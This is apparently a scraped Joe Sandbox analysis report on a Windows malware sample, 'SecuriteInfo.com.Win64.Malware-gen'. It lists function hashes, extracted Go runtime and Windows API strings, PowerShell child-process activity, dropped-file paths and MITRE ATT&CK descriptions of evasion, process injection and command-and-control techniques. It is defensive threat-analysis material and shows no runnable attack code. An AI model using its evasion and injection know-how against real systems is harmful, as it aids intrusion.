Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTe$ p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFile$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpect$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots=
API String ID: 0-3479450713
Opcode ID: 9119f7b11874d1a8757e1a2167669ca3d162930b4f5c7c8f293bbea00b9d2e1a
Instruction ID: 73520ff68d8a7bd0b3af7cb1d94a769c341ffef98a7b1c1cea061d6647f67d67
Opcode Fuzzy Hash: 9119f7b11874d1a8757e1a2167669ca3d162930b4f5c7c8f293bbea00b9d2e1a
Instruction Fuzzy Hash: 8D31AD36328B80DADF10EB14E58136EB7A4F789784F485426EE8D0B766CF38C904C760

Function 00A7B220 Relevance: 5.1, Strings: 4, Instructions: 63COMMON

Download Yara Rule

Strings

goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySy, xrefs: 00A7B2B5
gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllCoCreate, xrefs: 00A7B2F0
scan missed a gstartm: m has pstopm holding psync.Mutex.LocktimeBeginPeriodtraceback stuck already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobO, xrefs: 00A7B319
status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDecemberDuployanEqualSidEthiopicExtenderFebruaryFullPathGeorgianGoStringGujaratiGurmukhiHiraganaIsWindowJavaneseKatakanaKayah_LiLinear_ALinear_BMaha, xrefs: 00A7B2D0

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllCoCreate$ goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySy$ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDecemberDuployanEqualSidEthiopicExtenderFebruaryFullPathGeorgianGoStringGujaratiGurmukhiHiraganaIsWindowJavaneseKatakanaKayah_LiLinear_ALinear_BMaha$scan missed a gstartm: m has pstopm holding psync.Mutex.LocktimeBeginPeriodtraceback stuck already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobO
API String ID: 0-1745562291
Opcode ID: b6cb6d85c8a2adc03d0ec06faff91e1ba42a05f0810e3c92c11db0d37fab34cd
Instruction ID: d619f900c0b575ceb3a433f22f03271bbdc2666e8062318354c0ceedab861429
Opcode Fuzzy Hash: b6cb6d85c8a2adc03d0ec06faff91e1ba42a05f0810e3c92c11db0d37fab34cd
Instruction Fuzzy Hash: 20215175729A80D9DB10EB24E98135EBBA4F789740F889461EE8C07767CF3CC514DB60

Function 00AA1DA0 Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_Hi, xrefs: 00AA1EAC
wirep: invalid p state) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvi, xrefs: 00AA1E8F
wirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (381, xrefs: 00AA1E25
) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWGetAddrInfoWGetCommStateGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWJoin_ControlLoadLibraryWLoadResourceLockReso, xrefs: 00AA1E65

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWGetAddrInfoWGetCommStateGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWJoin_ControlLoadLibraryWLoadResourceLockReso$wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_Hi$wirep: invalid p state) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvi$wirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (381
API String ID: 0-1209974492
Opcode ID: d53de9f66e51aad2171822a9804e5caed97823fced6643adf0b53c2a758a75c9
Instruction ID: 3b9151e80a2e59be5f2f20dbf6dba3e11652141fa99b5cf04eb091c09c34b886
Opcode Fuzzy Hash: d53de9f66e51aad2171822a9804e5caed97823fced6643adf0b53c2a758a75c9
Instruction Fuzzy Hash: 44219A7A315B84CADB20EB00E54036EBBA5FB89B80F889620DF4D07366DB38C954C710

Analysis Process: powershell.exePID: 7644, Parent PID: 7576COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B87DA84 Relevance: 1.6, APIs: 1, Instructions: 114
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE ref: 00007FFD9B87DB2E

Memory Dump Source

Source File: 00000002.00000002.1988868898.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b870000_powershell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5e9887664363f0d807c7662adac4677bdd64f92c6679dd2b7a100c39b8348aa4
Instruction ID: 59f343ba16c27c909c182e5c248b446c714c65ff23da22db22072a475e7a26d4
Opcode Fuzzy Hash: 5e9887664363f0d807c7662adac4677bdd64f92c6679dd2b7a100c39b8348aa4
Instruction Fuzzy Hash: 2531F53190CA4C8FDB19DBA89849AE9BBF0FF55320F04422BD009D3251DB74A805CB91

Function 00007FFD9B87D49A Relevance: 1.6, APIs: 1, Instructions: 99
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE ref: 00007FFD9B87DB2E

Memory Dump Source

Source File: 00000002.00000002.1988868898.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b870000_powershell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 203e6fb0f2f429c9ef7391a6edd9a75d00a795f3e8ff11f4a9482555e1f3297b
Instruction ID: a3b3ffc9cccc9f6aaa723ed1cbba01c2d32faa51bb2c8aeb9f9858b75613f34f
Opcode Fuzzy Hash: 203e6fb0f2f429c9ef7391a6edd9a75d00a795f3e8ff11f4a9482555e1f3297b
Instruction Fuzzy Hash: 39217471908A1C9FDB58DF9CD849BF9BBE0FB59321F10822FD019D3651DB70A4468B91

Function 00007FFD9B94305B Relevance: .4, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1989356005.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 462e4cad05a7d07f192aee3b9266fe2c85621526d3cd577252e76281e06887b6
Instruction ID: cd45dd80203e4d9f577357b546aca8d4f4a9a45fe747858fc473d66f481c1215
Opcode Fuzzy Hash: 462e4cad05a7d07f192aee3b9266fe2c85621526d3cd577252e76281e06887b6
Instruction Fuzzy Hash: 17C17831B2EA9E2FE7A9EBB848655B57BD2EF15354B0801BED05DC70E3DE18AD018341

Function 00007FFD9B943231 Relevance: .2, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1989356005.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e34e90bbd612efc50d8d1a28fa4c701e010ee37c5a22a8762d619594e70d9580
Instruction ID: 690ef4fbed173539dd17494221d0c9f4ff86edd64018cde11c092243d9a38da4
Opcode Fuzzy Hash: e34e90bbd612efc50d8d1a28fa4c701e010ee37c5a22a8762d619594e70d9580
Instruction Fuzzy Hash: 4A810222B2FA9A2FE7BA96B844715B87BD2EF11354B5900FEC04DCB0E3DD18AD058341

Function 00007FFD9B943062 Relevance: .2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1989356005.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeb01a1a28f1ba51c4f8abfc2227d763c3031a782cd54c4010b7929638a32307
Instruction ID: 9722ca9e72c52202a91419d838429d78a867ba3a0c019a9072d07ca143c40b18
Opcode Fuzzy Hash: eeb01a1a28f1ba51c4f8abfc2227d763c3031a782cd54c4010b7929638a32307
Instruction Fuzzy Hash: BC710322B2FA9A6FE7BAD6B844611787BD2EF15354B5901FEC04DCB0E3DD18AD058341

Function 00007FFD9B9430B1 Relevance: .2, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1989356005.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5da2dac45c27f0bd769d58f845108c93c6a5e2e9cb6203a2cb266dd78070eea
Instruction ID: bc908e4c312982f848d7ec888ae586c9537928254b748dfe8242427210a4046b
Opcode Fuzzy Hash: f5da2dac45c27f0bd769d58f845108c93c6a5e2e9cb6203a2cb266dd78070eea
Instruction Fuzzy Hash: FF51E422B2FA9A6FE7BAD6B844715B87B92EF15354B5900FEC04DCB0E3DD18AD048301

Function 00007FFD9B9431E5 Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1989356005.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9434e8bf3e8c91390c49885ff4641d39f171ae806f72ea09caeecc1d9a619ae6
Instruction ID: 590a513fd38c2281d0f9a22f668281c9f9755fe3ccc0c78a122a88d151cff648
Opcode Fuzzy Hash: 9434e8bf3e8c91390c49885ff4641d39f171ae806f72ea09caeecc1d9a619ae6
Instruction Fuzzy Hash: 1711B132A0E3D55FEBA79AB854A14E47FA1DF17360B0A00FFC489DF0A3D9191846C321

Analysis Process: powershell.exePID: 8124, Parent PID: 7576COMMON

Executed Functions

Function 00007FFD9BAA5C7A Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2025716363.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88e245ed11df1f86e759c83d1c5b97f5a415cd57d337d228c8493ad5bb445b9e
Instruction ID: b7e222ab5b7f56fe51ca681d4a2391d9e7277b2326bbb49fe398884cd625391d
Opcode Fuzzy Hash: 88e245ed11df1f86e759c83d1c5b97f5a415cd57d337d228c8493ad5bb445b9e
Instruction Fuzzy Hash: 5371D331B0DA4D4FEBA8DB688C656B877D2EF58304F0601BDE44DC72E7CE69A8028745

Function 00007FFD9BAA3605 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2025716363.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 76f9b8c77221e9a95e3ba1e80e18607a3bc628598ac9c606391e40355430e36c
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 4E01677121CB0C4FD748EF0CE451AA6B7E0FF95364F10056DE58AC76A5D636E881CB45

Function 00007FFD9BAA8A8B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2025716363.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 887d95823edc575c545b4c3e5e43d1f93378fd3827ec97e265789f3417d44c82
Instruction ID: 720112e392fd725d6ca3c91477def306578a7ea16e2d393f2f1aa763c832a4d5
Opcode Fuzzy Hash: 887d95823edc575c545b4c3e5e43d1f93378fd3827ec97e265789f3417d44c82
Instruction Fuzzy Hash: 92F0272190E69A0FE725A7B4A8255A07FE1DF92130B0A07FAD888C71B3E94859864341

Function 00007FFD9BAA3E9C Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2025716363.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d313520517d26d79096579711444e4bef69466621c5e3db77adba1d1770be9b
Instruction ID: ce959786d5d3c155357452519098a84e651bb85946b6789054c66699780b94c6
Opcode Fuzzy Hash: 5d313520517d26d79096579711444e4bef69466621c5e3db77adba1d1770be9b
Instruction Fuzzy Hash: 74E09211A0FBE90FE77A67A808712216EE2DF5A501F0A40FBC089CB6F3D8DA1D454362

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13to5vl5.qjb.psm1

